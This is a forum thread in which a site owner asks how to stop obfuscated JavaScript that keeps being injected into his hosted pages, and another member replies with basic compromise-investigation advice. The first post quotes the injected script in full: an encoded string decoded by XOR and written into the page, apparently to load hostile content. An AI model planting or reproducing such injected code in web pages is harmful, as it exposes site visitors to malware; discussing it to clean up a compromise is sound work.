Results 1 to 2 of 2

Thread: Big Security Issue

  1. #1
    Junior Member Newbie
    Join Date
    Aug 2007
    Posts
    4

    Default Big Security Issue

    Hello,

    A lot of my sites on 2 different VPS' I have with spry have this issue.

    Somehow the following javascript code gets embedded on my sites right above the closing </body> tag resulting in anti-virus programs denying access to the page as it says these are virus'.

    HTML Code:
    <script language="JavaScript">e = '0x00' + '3A';str1 = "%81%D9%D2%CF%A5%C8%C9%C2%D1%DE%86%9B%CF%D2%C8%D2%DB%D2%D1%D2%C9%C2%83%DD%D2%D9%D9%DE%D7%9B%87%81%D2%DF%CB%DA%D6%DE%A5%C8%CB%D8%86%9B%DD%C9%C9%D5%83%94%94%D1%D2%D5%D4%D8%D7%C9%97%D8%D4%D6%94%D1%D9%94%D4%CF%CB%94%9B%A5%CC%D2%D9%C9%DD%86%8A%A5%DD%DE%D2%DC%DD%C9%86%8A%87%81%94%D2%DF%CB%DA%D6%DE%87%81%94%D9%D2%CF%87";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
    Does anyone know how to fix/prevent this from happening as it is a MAJOR pain to always remove it and then it somehow gets added again.

    Thanks,
    Joe

  2. #2
    Junior Member Newbie
    Join Date
    Apr 2007
    Posts
    23

    Default

    I would check the last modified time/date of the suspect files, then check your logs for who logged in around that time. I suspect your system is already comprimised, so take care in beleiving some of the typical system utilities. Or you can run a chkrootkit or some such tool.

    Also take care of what programs are runnign now and kill -9 off processes that you don't recognize.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •